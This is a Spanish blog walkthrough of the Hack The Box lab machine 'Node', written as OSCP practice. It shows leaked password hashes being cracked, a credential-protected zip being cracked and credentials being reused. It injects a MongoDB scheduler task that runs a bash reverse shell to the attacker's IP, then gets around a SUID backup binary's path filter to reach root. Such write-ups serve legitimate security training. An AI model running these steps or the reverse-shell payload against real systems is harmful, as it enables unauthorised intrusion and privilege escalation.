OSCP Path ~ Node de Hack The Box (Necesario VIP)
Published on 22 Jul 2021
Node ~ Hack The Box to OSCP
Realizamos el Primer escaneo con Nmap
$" nmap -p- --open -sS --min-rate 4000 -vvv -n -Pn -oG allports 10.10.10.58 "
Procedemos con el siguiente escaneo de Nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_ Logs: /login
| hadoop-tasktracker-info:
|_ Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Entramos para visualizar la web por el puerto 3000
Hacemos CTRL + U
Encontramos esto en js que hace referencia a una app pinchamos en + /profile/`
<script type="text/javascript" src="assets/js/app/controllers/profile.js"></script>
hacemos una peticion Curl
Procedemos pinchando en /assets/js/app/controllers/profile.js
# curl -s -X GET "http://10.10.10.58:3000/assets/js/app/controllers/profile.js" 4 ⨯
var controllers = angular.module('controllers');
controllers.controller('ProfileCtrl', function ($scope, $http, $routeParams) {
$http.get("'/api/users/'" + $routeParams.username)
.then(function (res) {
$scope.user = res.data;
}, function (res) {
$scope.hasError = true;
if (res.status == 404) {
$scope.errorMessage = 'This user does not exist';
}
else {
$scope.errorMessage = 'An unexpected error occurred';
}
});
});
Nos devuelve una ruta potencial: /api/users/ Procedemos a apuntar a ella y encontramos unas credenciales
# curl -s -X GET "http://10.10.10.58:3000/api/users/" | jq 123 ⨯
[
{
"_id": "59a7365b98aa325cc03ee51c",
"username": "myP14ceAdm1nAcc0uNT",
"password": "dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af",
"is_admin": true
},
{
"_id": "59a7368398aa325cc03ee51d",
"username": "tom",
"password": "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240",
"is_admin": false
},
{
"_id": "59a7368e98aa325cc03ee51e",
"username": "mark",
"password": "de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73",
"is_admin": false
},
{
"_id": "59aa9781cced6f1d1490fce9",
"username": "rastating",
"password": "5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0",
"is_admin": false
}
]
Credenciales:
User que es admin
user: myP14ceAdm1nAcc0uNT
pass: manchester
Accedemos – nos descargamos un archivo : myplace.backup
Le hacemos un cat al archivo vemos que esta en base64 asique procedemos a decodificarlo
# cat myplace.backup| base64 -d >> myplace
# file myplace
myplace: Zip archive data, at least v1.0 to extract
# 7z x myplace ------- NOS PIDE CONTRASEÑA
Procdemos a intentar crackearlo con la herramienta fcrackzip
# ls
myplace myplace.backup
# fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt -v myplace
PASSWORD FOUND!!!!: pw == "magicword"
Vemos que hemos obtenido un monton de directorios con recursos, nos metemops en /var/www/myplace
Filtramos por una busqueda para encontrar datos relevantes en los archivos
# cat app.js | grep -i -E "user|pass|db" 1 ⨯
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
MongoClient.connect(url, function(error, db) {
if (error || !db) {
console.log('[!] Failed to connect to mongodb');
Credenciales Obtenidas:
mark: 5AYRft73VtFpc84k
Entramos con estas credenciales por SSH por la reutilizacion de credenciales.
# ssh mark@10.10.10.58
mark@node:~$ ls -la
total 24
drwxr-xr-x 3 root root 4096 Sep 3 2017 .
drwxr-xr-x 5 root root 4096 Aug 31 2017 ..
-rw-r--r-- 1 root root 220 Aug 31 2017 .bash_logout
-rw-r--r-- 1 root root 3771 Aug 31 2017 .bashrc
drwx------ 2 root root 4096 Aug 31 2017 .cache
-rw-r----- 1 root root 0 Sep 3 2017 .dbshell
-rwxr-xr-x 1 root root 0 Sep 3 2017 .mongorc.js
-rw-r--r-- 1 root root 655 Aug 31 2017 .profile
Intentando enumerar el sistema un poco vemos que tenemos en /var/
encontramos el directorio /scheduler/ que suele ser para tareas cron a nivel de sistema o tiene relacion
mark@node:/var/scheduler$ ls -l
total 20
-rw-rw-r-- 1 root root 910 Sep 3 2017 app.js
drwxr-xr-x 19 root root 4096 Sep 3 2017 node_modules
-rw-rw-r-- 1 root root 176 Sep 3 2017 package.json
-rw-r--r-- 1 root root 4709 Sep 3 2017 package-lock.json
lanzamos un script procmon
para detectar tareas CRON a nivel de sistema
/usr/bin/mongod --auth --quiet --config /etc/mongod.conf
scheduler --?¿ -- Son tareas Cron a nivel de base de datos MONGO DB
> /usr/bin/node /var/scheduler/app.js
Probamos a conectarnos a la base de datos mongo que aparece bastante con las credenciales del
user: mark
pass: 5AYRft73VtFpc84k
Mongo-DB
Procedemos a injectar una tarea en la colleccion tasks
mark@node:/var/tmp/Cron-Finder$ mongo -u mark -p 5AYRft73VtFpc84k scheduler
MongoDB shell version: 3.2.16
connecting to: scheduler
> show collections
tasks
> db.task.find()
> db.task.insertOne({cmd: "bash /tmp/shell.sh"});
2021-07-22T00:33:47.675+0100 E QUERY [thread1] TypeError: db.task.instertOne is not a function :
@(shell):1:1
> db.task.find() --- lo ejecutamos hasta que desaparezca que sera cuandoi se ejecute el tinglado para entrar como el usuario TOM
volvemos a tener que instertar la tarea
> db.tasks.insertOne({cmd: "bash /tmp/shell.sh"});
> db.task.find() --- lo ejecutamos hasta que desaparezca que sera cuandoi se ejecute el tinglado para entrar como el usuario TOM
Previamente para que esto funcione nos montamos la /tmp/shell.sh, es importante hacer un chmod +x shell.sh
bash -i >& /dev/tcp/10.10.14.12/443 0>&1
Y esta si que nos lanza la shell directamente atraves de la tarea escrita en mongodb, pillamos la flag user.txt
# nc -vlnp 444 :
tom@node:~$ ls
user.txt
tom@node:~$ cat user.txt
e1156acc3574e04b06908exxxxxxxxx
# Privesc root
Una vez conseguida la shell para el user TOM, procedemos a apuntar al archivo app.js
Encontramos esto en parte del codigo de la app js:
var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
Chequeamos:
tom@node:/$ ls /usr/local/bin/backup
/usr/local/bin/backup
tom@node:/$ ls -l /usr/local/bin/backup
-rwsr-xr-- 1 root admin 16484 Sep 3 2017 /usr/local/bin/backup
Procedemos a ejecutarlo para ver lo que ocurre:
tom@node:/usr/local/bin$ backup asdfa asdfa /root/
____________________________________________________
/ \
| _____________________________________________ |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | Secure Backup v1.0 | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| |_____________________________________________| |
| |
\_____________________________________________________/
\_______________________________________/
_______________________________________________
_-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_
_-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_
_-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
_-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
_-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
:-----------------------------------------------------------------------------:
`---._.-----------------------------------------------------------------._.---'
[!] Ah-ah-ah! You didn't say the magic word!
Procedemos a ejecutarlo otra vez pero con el uso de la herramienta ltrace y en vez del directorio /root que es el primero que usamos, lo hacemos con /tmp.
Vemos que conm ltrace nos devuelve lo siguiente relevante:
strstr("/tmp", "..") = nil
strstr("/tmp", "/root") = nil
strchr("/tmp", ';') = nil
strchr("/tmp", '&') = nil
strchr("/tmp", '`') = nil
strchr("/tmp", '$') = nil
strchr("/tmp", '|') = nil
strstr("/tmp", "//") = nil
strcmp("/tmp", "/") = 1
strstr("/tmp", "/etc")
--------------
fopen("/etc/myplace/keys", "r")
Filtra por esos caracteres para a la hora de ejecutar el backup + key + /path/ y que no tenga esos caracteres en la ruta, si los tiene = TROLL FACE
Procedemos a hacer una cat /etc/myplace/keys
tom@node:/var/www/myplace$ cat /etc/myplace/keys
a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110 ----- Usamos esta
Pasandole la key e intentando hacer el backup del directorio /root … .. .
tom@node:/var/www/myplace$ /usr/local/bin/backup asda 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110 /root
Filtra por esos caracteres para a la hora de ejecutar el backup + key + /path/ y que no tenga esos caracteres en la ruta, si los tiene = TROLL FACE
# cat root.txt
QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____. -~""??9VWQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ
QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ
QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ
QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ
QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ
QQQQQQQP'.yQQQQQQQQQQQP" <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ
QQQQQP'_a.<aamQQQW!<yF "!` .. "??$Qa "WQQQWTVP' "??' =QQmWWV?46/ ?QQQQQ
QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ
QQ[ j@mQP'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"` -?QzQ7L ]QQQ
QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa .QP4QQQQfWkl jQQQ
QE ]QkQk $D?` waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ
QQ,-Qm4Q/-QmQ6 "WWQma/ "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@ "QW@?$:.yQQQQ
QQm/-4wTQgQWQQ, ?4WWk 4waac -???$waQQQQQQQQF??'<mWWWWWQW?^ ` ]6QQ' yQQQQQ
QQQQw,-?QmWQQQQw a, ?QWWQQQw _. "????9VWaamQWV???" a j/ ]QQf jQQQQQQ
QQQQQQw,"4QQQQQQm,-$Qa ???4F jQQQQQwc <aaas _aaaaa 4QW ]E )WQ`=QQQQQQQ
QQQQQQWQ/ $QQQQQQQa ?H ]Wwa, ???9WWWh dQWWW,=QWWU? ?! )WQ ]QQQQQQQ
QQQQQQQQQc-QWQQQQQW6, QWQWQQQk <c jWQ ]QQQQQQQ
QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,., . .; QWQ.]QQQQQQQ
QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ
QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ
QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,, --~-- --- . _ssawmQQQQQQk 3QQQQWQ
QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ
QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ
nos devuelve una troll face porque justamente vemos que filtra por badcharacteres /root/
Vemos que el simbolito de cd ~ que sirve para apuntar al directorio /home/ no esta contemplado en los badchars.
Procedemos a cambiar la variable HOME por /root/ para cuando hagamos cd ~ y ese simbolito que justamente no esta filtrado en el script de arriba y sirve para referenciar el directorio root nos apunte al directorio root.
Ejecutando elarchivo backup correctamente tras cambiar la variable /HOME/:
tom@node:/$ /usr/local/bin/backup asda 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110 "~"
Nos devuelve una cadena en base64:
echo "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"| base64 -d > root.zip
Usando 7z x para extraer el archivo root.zip
─# 7z x root.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=es_ES.UTF-8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i7-8700K CPU @ 3.70GHz (906EA),ASM,AES-NI)
Scanning the drive for archives:
1 file, 1141 bytes (2 KiB)
Extracting archive: root.zip
--
Path = root.zip
Type = zip
Physical Size = 1141
Enter password (will not be echoed): "magicword"
Everything is Ok
Size: 2584
Compressed: 1141
(root💀kali)-[/home/…/HTB/OSCP/Node/tmp]
└─# ls
root.txt root.zip
Procedemos a sacar la flag de root.txt
# cat root.txt
1722e99ca5f353b3625xxxxxxxxxxxxxx
Maquina Rooteada =)